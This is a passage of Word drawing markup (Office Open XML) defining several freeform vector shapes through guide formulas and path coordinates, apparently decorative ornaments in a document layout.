                                  <a:gd name="T30" fmla="*/ 42 w 119"/>
                                  <a:gd name="T31" fmla="*/ 52 h 52"/>
                                  <a:gd name="T32" fmla="*/ 26 w 119"/>
                                  <a:gd name="T33" fmla="*/ 48 h 52"/>
                                  <a:gd name="T34" fmla="*/ 5 w 119"/>
                                  <a:gd name="T35" fmla="*/ 35 h 52"/>
                                  <a:gd name="T36" fmla="*/ 0 w 119"/>
                                  <a:gd name="T37" fmla="*/ 22 h 52"/>
                                  <a:gd name="T38" fmla="*/ 5 w 119"/>
                                  <a:gd name="T39" fmla="*/ 9 h 52"/>
                                  <a:gd name="T40" fmla="*/ 21 w 119"/>
                                  <a:gd name="T41" fmla="*/ 0 h 52"/>
                                  <a:gd name="T42" fmla="*/ 42 w 119"/>
                                  <a:gd name="T43" fmla="*/ 0 h 52"/>
                                  <a:gd name="T44" fmla="*/ 78 w 119"/>
                                  <a:gd name="T45" fmla="*/ 4 h 52"/>
                                  <a:gd name="T46" fmla="*/ 114 w 119"/>
                                  <a:gd name="T4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2">
                                    <a:moveTo>
                                      <a:pt x="114" y="22"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="104" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="22"/>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53" name="Freeform 307"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7788" y="3105"/>
                                <a:ext cx="88" cy="73"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 83 w 88"/>
                                  <a:gd name="T1" fmla="*/ 17 h 73"/>
                                  <a:gd name="T2" fmla="*/ 88 w 88"/>
                                  <a:gd name="T3" fmla="*/ 34 h 73"/>
                                  <a:gd name="T4" fmla="*/ 88 w 88"/>
                                  <a:gd name="T5" fmla="*/ 52 h 73"/>
                                  <a:gd name="T6" fmla="*/ 67 w 88"/>
                                  <a:gd name="T7" fmla="*/ 69 h 73"/>
                                  <a:gd name="T8" fmla="*/ 47 w 88"/>
                                  <a:gd name="T9" fmla="*/ 73 h 73"/>
                                  <a:gd name="T10" fmla="*/ 26 w 88"/>
                                  <a:gd name="T11" fmla="*/ 73 h 73"/>
                                  <a:gd name="T12" fmla="*/ 5 w 88"/>
                                  <a:gd name="T13" fmla="*/ 60 h 73"/>
                                  <a:gd name="T14" fmla="*/ 0 w 88"/>
                                  <a:gd name="T15" fmla="*/ 47 h 73"/>
                                  <a:gd name="T16" fmla="*/ 5 w 88"/>
                                  <a:gd name="T17" fmla="*/ 30 h 73"/>
                                  <a:gd name="T18" fmla="*/ 16 w 88"/>
                                  <a:gd name="T19" fmla="*/ 26 h 73"/>
                                  <a:gd name="T20" fmla="*/ 21 w 88"/>
                                  <a:gd name="T21" fmla="*/ 30 h 73"/>
                                  <a:gd name="T22" fmla="*/ 21 w 88"/>
                                  <a:gd name="T23" fmla="*/ 43 h 73"/>
                                  <a:gd name="T24" fmla="*/ 21 w 88"/>
                                  <a:gd name="T25" fmla="*/ 47 h 73"/>
                                  <a:gd name="T26" fmla="*/ 31 w 88"/>
                                  <a:gd name="T27" fmla="*/ 56 h 73"/>
                                  <a:gd name="T28" fmla="*/ 42 w 88"/>
                                  <a:gd name="T29" fmla="*/ 56 h 73"/>
                                  <a:gd name="T30" fmla="*/ 52 w 88"/>
                                  <a:gd name="T31" fmla="*/ 52 h 73"/>
                                  <a:gd name="T32" fmla="*/ 62 w 88"/>
                                  <a:gd name="T33" fmla="*/ 39 h 73"/>
                                  <a:gd name="T34" fmla="*/ 62 w 88"/>
                                  <a:gd name="T35" fmla="*/ 26 h 73"/>
                                  <a:gd name="T36" fmla="*/ 62 w 88"/>
                                  <a:gd name="T37" fmla="*/ 21 h 73"/>
                                  <a:gd name="T38" fmla="*/ 57 w 88"/>
                                  <a:gd name="T39" fmla="*/ 17 h 73"/>
                                  <a:gd name="T40" fmla="*/ 42 w 88"/>
                                  <a:gd name="T41" fmla="*/ 21 h 73"/>
                                  <a:gd name="T42" fmla="*/ 42 w 88"/>
                                  <a:gd name="T43" fmla="*/ 21 h 73"/>
                                  <a:gd name="T44" fmla="*/ 31 w 88"/>
                                  <a:gd name="T45" fmla="*/ 17 h 73"/>
                                  <a:gd name="T46" fmla="*/ 31 w 88"/>
                                  <a:gd name="T47" fmla="*/ 13 h 73"/>
                                  <a:gd name="T48" fmla="*/ 36 w 88"/>
                                  <a:gd name="T49" fmla="*/ 4 h 73"/>
                                  <a:gd name="T50" fmla="*/ 52 w 88"/>
                                  <a:gd name="T51" fmla="*/ 0 h 73"/>
                                  <a:gd name="T52" fmla="*/ 62 w 88"/>
                                  <a:gd name="T53" fmla="*/ 4 h 73"/>
                                  <a:gd name="T54" fmla="*/ 78 w 88"/>
                                  <a:gd name="T55" fmla="*/ 8 h 73"/>
                                  <a:gd name="T56" fmla="*/ 83 w 88"/>
                                  <a:gd name="T57" fmla="*/ 1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73">
                                    <a:moveTo>
                                      <a:pt x="83" y="17"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="73"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="42" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="78" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="17"/>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54" name="Freeform 308"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7530" y="3109"/>
                                <a:ext cx="15" cy="1351"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 10 w 15"/>
                                  <a:gd name="T1" fmla="*/ 9 h 1351"/>
                                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                                  <a:gd name="T3" fmla="*/ 1277 h 1351"/>
                                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                                  <a:gd name="T5" fmla="*/ 1316 h 1351"/>
                                  <a:gd name="T6" fmla="*/ 10 w 15"/>
                                  <a:gd name="T7" fmla="*/ 1334 h 1351"/>
                                  <a:gd name="T8" fmla="*/ 0 w 15"/>
                                  <a:gd name="T9" fmla="*/ 1351 h 1351"/>
                                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                                  <a:gd name="T11" fmla="*/ 1273 h 1351"/>
                                  <a:gd name="T12" fmla="*/ 0 w 15"/>
                                  <a:gd name="T13" fmla="*/ 4 h 1351"/>
                                  <a:gd name="T14" fmla="*/ 10 w 15"/>
                                  <a:gd name="T15" fmla="*/ 0 h 1351"/>
                                  <a:gd name="T16" fmla="*/ 10 w 15"/>
                                  <a:gd name="T17" fmla="*/ 4 h 1351"/>
                                  <a:gd name="T18" fmla="*/ 10 w 15"/>
                                  <a:gd name="T19" fmla="*/ 9 h 1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351">
                                    <a:moveTo>
                                      <a:pt x="10" y="9"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="1277"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="1316"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="1334"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1351"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1273"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="9"/>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09"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7483" y="3118"/>
                                <a:ext cx="21" cy="1381"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 21 w 21"/>
                                  <a:gd name="T1" fmla="*/ 1381 h 1381"/>
                                  <a:gd name="T2" fmla="*/ 0 w 21"/>
                                  <a:gd name="T3" fmla="*/ 1372 h 1381"/>
                                  <a:gd name="T4" fmla="*/ 0 w 21"/>
                                  <a:gd name="T5" fmla="*/ 1368 h 1381"/>
                                  <a:gd name="T6" fmla="*/ 0 w 21"/>
                                  <a:gd name="T7" fmla="*/ 1355 h 1381"/>
                                  <a:gd name="T8" fmla="*/ 0 w 21"/>
                                  <a:gd name="T9" fmla="*/ 1338 h 1381"/>
                                  <a:gd name="T10" fmla="*/ 0 w 21"/>
                                  <a:gd name="T11" fmla="*/ 1312 h 1381"/>
                                  <a:gd name="T12" fmla="*/ 0 w 21"/>
                                  <a:gd name="T13" fmla="*/ 1281 h 1381"/>
                                  <a:gd name="T14" fmla="*/ 0 w 21"/>
                                  <a:gd name="T15" fmla="*/ 1247 h 1381"/>
                                  <a:gd name="T16" fmla="*/ 0 w 21"/>
                                  <a:gd name="T17" fmla="*/ 1203 h 1381"/>
                                  <a:gd name="T18" fmla="*/ 0 w 21"/>
                                  <a:gd name="T19" fmla="*/ 1160 h 1381"/>
                                  <a:gd name="T20" fmla="*/ 0 w 21"/>
                                  <a:gd name="T21" fmla="*/ 1108 h 1381"/>
                                  <a:gd name="T22" fmla="*/ 0 w 21"/>
                                  <a:gd name="T23" fmla="*/ 1056 h 1381"/>
                                  <a:gd name="T24" fmla="*/ 0 w 21"/>
                                  <a:gd name="T25" fmla="*/ 939 h 1381"/>
                                  <a:gd name="T26" fmla="*/ 0 w 21"/>
                                  <a:gd name="T27" fmla="*/ 818 h 1381"/>
                                  <a:gd name="T28" fmla="*/ 0 w 21"/>
                                  <a:gd name="T29" fmla="*/ 693 h 1381"/>
                                  <a:gd name="T30" fmla="*/ 0 w 21"/>
                                  <a:gd name="T31" fmla="*/ 567 h 1381"/>
                                  <a:gd name="T32" fmla="*/ 0 w 21"/>
                                  <a:gd name="T33" fmla="*/ 441 h 1381"/>
                                  <a:gd name="T34" fmla="*/ 0 w 21"/>
                                  <a:gd name="T35" fmla="*/ 324 h 1381"/>
                                  <a:gd name="T36" fmla="*/ 0 w 21"/>
                                  <a:gd name="T37" fmla="*/ 273 h 1381"/>
                                  <a:gd name="T38" fmla="*/ 0 w 21"/>
                                  <a:gd name="T39" fmla="*/ 225 h 1381"/>
                                  <a:gd name="T40" fmla="*/ 0 w 21"/>
                                  <a:gd name="T41" fmla="*/ 177 h 1381"/>
                                  <a:gd name="T42" fmla="*/ 0 w 21"/>
                                  <a:gd name="T43" fmla="*/ 134 h 1381"/>
                                  <a:gd name="T44" fmla="*/ 0 w 21"/>
                                  <a:gd name="T45" fmla="*/ 99 h 1381"/>
                                  <a:gd name="T46" fmla="*/ 0 w 21"/>
                                  <a:gd name="T47" fmla="*/ 69 h 1381"/>
                                  <a:gd name="T48" fmla="*/ 0 w 21"/>
                                  <a:gd name="T49" fmla="*/ 43 h 1381"/>
                                  <a:gd name="T50" fmla="*/ 0 w 21"/>
                                  <a:gd name="T51" fmla="*/ 26 h 1381"/>
                                  <a:gd name="T52" fmla="*/ 0 w 21"/>
                                  <a:gd name="T53" fmla="*/ 13 h 1381"/>
                                  <a:gd name="T54" fmla="*/ 0 w 21"/>
                                  <a:gd name="T55" fmla="*/ 13 h 1381"/>
                                  <a:gd name="T56" fmla="*/ 21 w 21"/>
                                  <a:gd name="T57" fmla="*/ 0 h 1381"/>
                                  <a:gd name="T58" fmla="*/ 21 w 21"/>
                                  <a:gd name="T59" fmla="*/ 0 h 1381"/>
                                  <a:gd name="T60" fmla="*/ 21 w 21"/>
                                  <a:gd name="T61" fmla="*/ 13 h 1381"/>
                                  <a:gd name="T62" fmla="*/ 21 w 21"/>
                                  <a:gd name="T63" fmla="*/ 30 h 1381"/>
                                  <a:gd name="T64" fmla="*/ 21 w 21"/>
                                  <a:gd name="T65" fmla="*/ 60 h 1381"/>
                                  <a:gd name="T66" fmla="*/ 21 w 21"/>
                                  <a:gd name="T67" fmla="*/ 91 h 1381"/>
                                  <a:gd name="T68" fmla="*/ 21 w 21"/>
                                  <a:gd name="T69" fmla="*/ 125 h 1381"/>
                                  <a:gd name="T70" fmla="*/ 21 w 21"/>
                                  <a:gd name="T71" fmla="*/ 169 h 1381"/>
                                  <a:gd name="T72" fmla="*/ 21 w 21"/>
                                  <a:gd name="T73" fmla="*/ 212 h 1381"/>
                                  <a:gd name="T74" fmla="*/ 21 w 21"/>
                                  <a:gd name="T75" fmla="*/ 264 h 1381"/>
                                  <a:gd name="T76" fmla="*/ 21 w 21"/>
                                  <a:gd name="T77" fmla="*/ 320 h 1381"/>
                                  <a:gd name="T78" fmla="*/ 21 w 21"/>
                                  <a:gd name="T79" fmla="*/ 437 h 1381"/>
                                  <a:gd name="T80" fmla="*/ 21 w 21"/>
                                  <a:gd name="T81" fmla="*/ 563 h 1381"/>
                                  <a:gd name="T82" fmla="*/ 21 w 21"/>
                                  <a:gd name="T83" fmla="*/ 688 h 1381"/>
                                  <a:gd name="T84" fmla="*/ 21 w 21"/>
                                  <a:gd name="T85" fmla="*/ 818 h 1381"/>
                                  <a:gd name="T86" fmla="*/ 21 w 21"/>
                                  <a:gd name="T87" fmla="*/ 944 h 1381"/>
                                  <a:gd name="T88" fmla="*/ 21 w 21"/>
                                  <a:gd name="T89" fmla="*/ 1061 h 1381"/>
                                  <a:gd name="T90" fmla="*/ 21 w 21"/>
                                  <a:gd name="T91" fmla="*/ 1113 h 1381"/>
                                  <a:gd name="T92" fmla="*/ 21 w 21"/>
                                  <a:gd name="T93" fmla="*/ 1169 h 1381"/>
                                  <a:gd name="T94" fmla="*/ 21 w 21"/>
                                  <a:gd name="T95" fmla="*/ 1212 h 1381"/>
                                  <a:gd name="T96" fmla="*/ 21 w 21"/>
                                  <a:gd name="T97" fmla="*/ 1255 h 1381"/>
                                  <a:gd name="T98" fmla="*/ 21 w 21"/>
                                  <a:gd name="T99" fmla="*/ 1290 h 1381"/>
                                  <a:gd name="T100" fmla="*/ 21 w 21"/>
                                  <a:gd name="T101" fmla="*/ 1320 h 1381"/>
                                  <a:gd name="T102" fmla="*/ 21 w 21"/>
                                  <a:gd name="T103" fmla="*/ 1351 h 1381"/>
                                  <a:gd name="T104" fmla="*/ 21 w 21"/>
                                  <a:gd name="T105" fmla="*/ 1364 h 1381"/>
                                  <a:gd name="T106" fmla="*/ 21 w 21"/>
                                  <a:gd name="T107" fmla="*/ 1381 h 1381"/>
                                  <a:gd name="T108" fmla="*/ 21 w 21"/>
                                  <a:gd name="T109" fmla="*/ 1381 h 1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1" h="1381">
                                    <a:moveTo>
                                      <a:pt x="21" y="1381"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1372"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1368"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1355"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1338"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1312"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1281"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1247"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1203"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="1056"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="939"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="818"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="693"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="567"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="441"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="324"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="273"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="177"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="99"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="60"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="125"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="212"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="264"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="320"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="437"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="563"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="688"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="818"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="944"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1061"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1212"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1255"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1290"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1320"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1351"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="1364"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="138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10"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8057" y="3131"/>
                                <a:ext cx="155" cy="82"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 129 w 155"/>
                                  <a:gd name="T1" fmla="*/ 8 h 82"/>
                                  <a:gd name="T2" fmla="*/ 119 w 155"/>
                                  <a:gd name="T3" fmla="*/ 26 h 82"/>
                                  <a:gd name="T4" fmla="*/ 114 w 155"/>
                                  <a:gd name="T5" fmla="*/ 39 h 82"/>
                                  <a:gd name="T6" fmla="*/ 119 w 155"/>
                                  <a:gd name="T7" fmla="*/ 52 h 82"/>
                                  <a:gd name="T8" fmla="*/ 124 w 155"/>
                                  <a:gd name="T9" fmla="*/ 56 h 82"/>
                                  <a:gd name="T10" fmla="*/ 129 w 155"/>
                                  <a:gd name="T11" fmla="*/ 56 h 82"/>
                                  <a:gd name="T12" fmla="*/ 134 w 155"/>
                                  <a:gd name="T13" fmla="*/ 47 h 82"/>
                                  <a:gd name="T14" fmla="*/ 145 w 155"/>
                                  <a:gd name="T15" fmla="*/ 47 h 82"/>
                                  <a:gd name="T16" fmla="*/ 150 w 155"/>
                                  <a:gd name="T17" fmla="*/ 47 h 82"/>
                                  <a:gd name="T18" fmla="*/ 155 w 155"/>
                                  <a:gd name="T19" fmla="*/ 52 h 82"/>
                                  <a:gd name="T20" fmla="*/ 150 w 155"/>
                                  <a:gd name="T21" fmla="*/ 65 h 82"/>
                                  <a:gd name="T22" fmla="*/ 134 w 155"/>
                                  <a:gd name="T23" fmla="*/ 78 h 82"/>
                                  <a:gd name="T24" fmla="*/ 129 w 155"/>
                                  <a:gd name="T25" fmla="*/ 78 h 82"/>
                                  <a:gd name="T26" fmla="*/ 119 w 155"/>
                                  <a:gd name="T27" fmla="*/ 73 h 82"/>
                                  <a:gd name="T28" fmla="*/ 109 w 155"/>
                                  <a:gd name="T29" fmla="*/ 65 h 82"/>
                                  <a:gd name="T30" fmla="*/ 98 w 155"/>
                                  <a:gd name="T31" fmla="*/ 56 h 82"/>
                                  <a:gd name="T32" fmla="*/ 98 w 155"/>
                                  <a:gd name="T33" fmla="*/ 47 h 82"/>
                                  <a:gd name="T34" fmla="*/ 98 w 155"/>
                                  <a:gd name="T35" fmla="*/ 21 h 82"/>
                                  <a:gd name="T36" fmla="*/ 67 w 155"/>
                                  <a:gd name="T37" fmla="*/ 26 h 82"/>
                                  <a:gd name="T38" fmla="*/ 36 w 155"/>
                                  <a:gd name="T39" fmla="*/ 30 h 82"/>
                                  <a:gd name="T40" fmla="*/ 26 w 155"/>
                                  <a:gd name="T41" fmla="*/ 43 h 82"/>
                                  <a:gd name="T42" fmla="*/ 21 w 155"/>
                                  <a:gd name="T43" fmla="*/ 52 h 82"/>
                                  <a:gd name="T44" fmla="*/ 26 w 155"/>
                                  <a:gd name="T45" fmla="*/ 56 h 82"/>
                                  <a:gd name="T46" fmla="*/ 31 w 155"/>
                                  <a:gd name="T47" fmla="*/ 60 h 82"/>
                                  <a:gd name="T48" fmla="*/ 41 w 155"/>
                                  <a:gd name="T49" fmla="*/ 60 h 82"/>
                                  <a:gd name="T50" fmla="*/ 52 w 155"/>
                                  <a:gd name="T51" fmla="*/ 52 h 82"/>
                                  <a:gd name="T52" fmla="*/ 62 w 155"/>
                                  <a:gd name="T53" fmla="*/ 47 h 82"/>
                                  <a:gd name="T54" fmla="*/ 67 w 155"/>
                                  <a:gd name="T55" fmla="*/ 47 h 82"/>
                                  <a:gd name="T56" fmla="*/ 72 w 155"/>
                                  <a:gd name="T57" fmla="*/ 60 h 82"/>
                                  <a:gd name="T58" fmla="*/ 62 w 155"/>
                                  <a:gd name="T59" fmla="*/ 65 h 82"/>
                                  <a:gd name="T60" fmla="*/ 46 w 155"/>
                                  <a:gd name="T61" fmla="*/ 78 h 82"/>
                                  <a:gd name="T62" fmla="*/ 36 w 155"/>
                                  <a:gd name="T63" fmla="*/ 82 h 82"/>
                                  <a:gd name="T64" fmla="*/ 26 w 155"/>
                                  <a:gd name="T65" fmla="*/ 82 h 82"/>
                                  <a:gd name="T66" fmla="*/ 10 w 155"/>
                                  <a:gd name="T67" fmla="*/ 78 h 82"/>
                                  <a:gd name="T68" fmla="*/ 0 w 155"/>
                                  <a:gd name="T69" fmla="*/ 60 h 82"/>
                                  <a:gd name="T70" fmla="*/ 0 w 155"/>
                                  <a:gd name="T71" fmla="*/ 43 h 82"/>
                                  <a:gd name="T72" fmla="*/ 10 w 155"/>
                                  <a:gd name="T73" fmla="*/ 30 h 82"/>
                                  <a:gd name="T74" fmla="*/ 31 w 155"/>
                                  <a:gd name="T75" fmla="*/ 17 h 82"/>
                                  <a:gd name="T76" fmla="*/ 52 w 155"/>
                                  <a:gd name="T77" fmla="*/ 8 h 82"/>
                                  <a:gd name="T78" fmla="*/ 77 w 155"/>
                                  <a:gd name="T79" fmla="*/ 8 h 82"/>
                                  <a:gd name="T80" fmla="*/ 98 w 155"/>
                                  <a:gd name="T81" fmla="*/ 8 h 82"/>
                                  <a:gd name="T82" fmla="*/ 98 w 155"/>
                                  <a:gd name="T83" fmla="*/ 17 h 82"/>
                                  <a:gd name="T84" fmla="*/ 114 w 155"/>
                                  <a:gd name="T85" fmla="*/ 4 h 82"/>
                                  <a:gd name="T86" fmla="*/ 124 w 155"/>
                                  <a:gd name="T87" fmla="*/ 0 h 82"/>
                                  <a:gd name="T88" fmla="*/ 129 w 155"/>
                                  <a:gd name="T89" fmla="*/ 8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5" h="82">
                                    <a:moveTo>
                                      <a:pt x="129" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="119" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="47"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="155" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="150" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="78"/>
